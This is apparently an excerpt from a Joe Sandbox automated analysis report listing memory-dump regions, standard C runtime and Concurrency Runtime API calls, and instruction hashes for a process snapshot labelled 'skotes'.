                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                                                                                                                                    • String ID: ib
                                                                                                                                                                    • API String ID: 1182035702-3771325155
                                                                                                                                                                    • Opcode ID: 71700c85faff97f5eb7dc33dde518572655dcbf2d30e313dd13ddaf44758d726
                                                                                                                                                                    • Instruction ID: 1fd3b42cea6c0bc71d54961bf4fe1b65c9905016b9a280896fa0ce35b8b4508e
                                                                                                                                                                    • Opcode Fuzzy Hash: 71700c85faff97f5eb7dc33dde518572655dcbf2d30e313dd13ddaf44758d726
                                                                                                                                                                    • Instruction Fuzzy Hash: A621A370C00669CADF64DFA4E9556EEBBF2BF14320F20093DE051A62D1E7B24A44CF55
                                                                                                                                                                    Function 006378E1 Relevance: 12.1, APIs: 8, Instructions: 106timeCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00637903
                                                                                                                                                                      • Part of subcall function 00635CB8: __EH_prolog3_catch.LIBCMT ref: 00635CBF
                                                                                                                                                                      • Part of subcall function 00635CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00635CF8
                                                                                                                                                                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0063792A
                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00637936
                                                                                                                                                                      • Part of subcall function 00635CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00635D70
                                                                                                                                                                      • Part of subcall function 00635CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00635D7E
                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00637982
                                                                                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 006379A3
                                                                                                                                                                    • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 006379AB
                                                                                                                                                                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 006379BD
                                                                                                                                                                    • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 006379ED
                                                                                                                                                                      • Part of subcall function 0063691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00636942
                                                                                                                                                                      • Part of subcall function 0063691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00636965
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1475861073-0
                                                                                                                                                                    • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                    • Instruction ID: e82fc58dd533b576ec8b35d370557ce1fb60eeef8adc82f1ca5af694861b186e
                                                                                                                                                                    • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                    • Instruction Fuzzy Hash: 1A312770B08255AACF66AB7848927FEB7B79F41300F0402ADD496EB382DB245D4AC3D1
                                                                                                                                                                    Function 00654C14 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00654C98
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00654D5E
                                                                                                                                                                    • __freea.LIBCMT ref: 00654DCA
                                                                                                                                                                      • Part of subcall function 0064B04B: RtlAllocateHeap.NTDLL(00000000,2054CAE1,?,?,0062D3FC,2054CAE1,?,00627A8B,?,?,?,?,?,?,00617465,?), ref: 0064B07E
                                                                                                                                                                    • __freea.LIBCMT ref: 00654DD3
                                                                                                                                                                    • __freea.LIBCMT ref: 00654DF6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                    • String ID: Zd,md
                                                                                                                                                                    • API String ID: 1423051803-1215882471
                                                                                                                                                                    • Opcode ID: d9228ca542b1283b4c5d318539443c761b336e0e55fe7a0e24cff7c9772a1c75
                                                                                                                                                                    • Instruction ID: 1b69b29edc3b0e7b43dca8fa1399bcb9946ebba7984c18f3c76d3ca7081142dc
                                                                                                                                                                    • Opcode Fuzzy Hash: d9228ca542b1283b4c5d318539443c761b336e0e55fe7a0e24cff7c9772a1c75
                                                                                                                                                                    • Instruction Fuzzy Hash: A151E272600216AFDB259F64DC41EFB36BBDF8075AF2502A9FD0497240EF30DC958AA4
                                                                                                                                                                    Function 0063DD18 Relevance: 10.6, APIs: 7, Instructions: 117threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 0063DD91
                                                                                                                                                                    • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 0063DDAE
                                                                                                                                                                    • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 0063DE14
                                                                                                                                                                    • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 0063DE29
                                                                                                                                                                    • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 0063DE3B
                                                                                                                                                                    • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 0063DE4B
                                                                                                                                                                    • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 0063DE74
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
